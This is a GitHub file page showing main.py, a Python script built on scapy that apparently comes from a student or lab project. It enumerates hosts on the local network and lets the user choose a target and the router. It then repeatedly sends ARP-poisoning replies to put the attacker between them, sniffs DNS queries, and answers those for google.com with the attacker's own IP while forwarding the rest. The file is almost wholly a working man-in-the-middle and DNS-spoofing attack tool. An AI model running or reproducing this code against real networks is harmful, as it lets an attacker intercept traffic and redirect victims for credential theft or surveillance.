-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
133 lines (120 loc) · 5.18 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/usr/bin/python3
from ipaddress import IPv4Network # Used to check if the IP address entered by the user is valid and also get the IP address of the attacker.
from scapy import all as scapy # Used to send and receive packets.
from scapy.layers.inet import IP, UDP
from scapy.layers.dns import DNS, DNSQR, DNSRR
from socket import * # Used to get the network mask.
from fcntl import ioctl # Used to get the network mask.
from struct import pack # Used to get the network mask.
import os # Used to check if the program is running on my computer or on a VM.
def interfaceChecker():
""" Check the name of the computer and return the interface name (it depend of the machine).
If it is running on my computer, it returns the interface name : 'wlp0s20f3'.
If it is running on a VM, it returns the interface name : 'enp0s8'.
"""
if os.uname()[1] == 'machine':
interface = 'enp0s8'
else:
interface = 'wlp0s20f3'
return interface
def getNetworkMask(interface):
""" Returns the network mask of the interface passed in parameter.
Parameters
----------
interface : str
The name of the interface.
Returns
-------
str
"""
s = socket(AF_INET, SOCK_DGRAM)
netmask = ioctl(s.fileno(), 0x891b, pack('256s', interface[:15].encode('utf-8')))[20:24]
return inet_ntoa(netmask)
def makeARPRequest(ip):
""" Sends an ARP request to the network and returns the answered and unanswered packets.
Parameters
----------
ip : str
The IP address of the network.
Returns
-------
answered : list
The answered packets.
unanswered : list
The unanswered packets.
"""
arpRequest = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
arpRequestBroadcast = broadcast / arpRequest
(answered, unanswered) = scapy.srp(arpRequestBroadcast, timeout=1, verbose=0)
return answered, unanswered
def forwardDnsSpoofing(spooferIP):
""" Call `forwardDNS()` function when a DNS request is received. This function is called by `scapy.sniff()` function.
Parameters
----------
spooferIP : str
The IP address of the attacker.
Returns
-------
function
"""
def forwardDNS(orgPacket: IP):
""" Either send a DNS response with the IP address of the attacker or send a DNS response with the correct IP address of the domain by resolving it with google DNS server.
Parameters
----------
orgPacket : IP
The packet received by the attacker.
"""
print(orgPacket[DNSQR].qname)
if orgPacket[DNSQR].qname == b'google.com.':
print('DNS Spoofing')
spoofedPacket = IP(dst=orgPacket[IP].src, src=orgPacket[IP].dst) / UDP(dport=orgPacket[UDP].sport, sport=orgPacket[UDP].dport) / DNS(id=orgPacket[DNS].id, qr=1, qd=orgPacket[DNS].qd, an=DNSRR(rrname=orgPacket[DNSQR].qname, ttl=10, rdata=spooferIP) / DNSRR(rrname=orgPacket[DNSQR].qname, ttl=10, rdata=spooferIP))
scapy.send(spoofedPacket, verbose=1)
print('DNS Spoofed')
else:
print('DNS Forwarding')
newPacket = IP(dst='8.8.8.8') / UDP(sport=orgPacket[UDP].sport, dport=53) / DNS(rd=1, id=orgPacket[DNS].id, qd=DNSQR(qname=orgPacket[DNSQR].qname))
answer = scapy.sr1(newPacket)
respPacket = IP(dst=orgPacket[IP].src, src=orgPacket[IP].dst) / UDP(dport=orgPacket[UDP].sport, sport=orgPacket[UDP].dport) / DNS()
respPacket[DNS] = answer[DNS]
scapy.send(respPacket, verbose=1)
print('DNS Forwarded')
print('DNS spoofing started')
return forwardDNS
def main():
""" The main function. """
## Initialization
interface = interfaceChecker()
netmask = getNetworkMask(interface)
myIp=scapy.get_if_addr(interface)
myMac=scapy.get_if_hwaddr(interface)
address = IPv4Network(myIp + '/' + netmask, False)
ip = address.network_address
pcs=[]
addressMask = address.prefixlen
## Get all the IP addresses of the network
answered, unanswered = makeARPRequest(str(ip)+'/'+str(addressMask))
for element in answered:
pcs.append([element[1].hwsrc, element[1].psrc])
pcs.sort(key=lambda x: [int (y) for y in x[1].split('.')])
compteur = 0
for pc in pcs:
print(str(compteur+1)+ ' - ' + pc[0] + ' ' + pc[1])
compteur+=1
## Select the target and the router
cible=input('Entrez le numéro de la cible : ')
cible=pcs[int(cible)-1]
print('Vous avez choisi : ' + cible[0] + ' ' + cible[1])
routeur=input('Entrez le numéro du routeur : ')
routeur=pcs[int(routeur)-1]
print('Vous avez choisi : ' + routeur[0] + ' ' + routeur[1])
## Launch the attack
while True:
## Send ARP Poisoning to the target
scapy.send(scapy.ARP(op=2, pdst=cible[1], hwdst=cible[0], psrc=routeur[1], hwsrc=myMac), verbose=0)
## Send ARP Poisoning to the router
scapy.send(scapy.ARP(op=2, pdst=routeur[1], hwdst=routeur[0], psrc=cible[1], hwsrc=myMac), verbose=0)
## Intercept the DNS request
scapy.sniff(prn=forwardDnsSpoofing(myIp), filter='udp port 53', iface=interface, store=0, timeout=60, count=1)
if __name__ == '__main__':
main()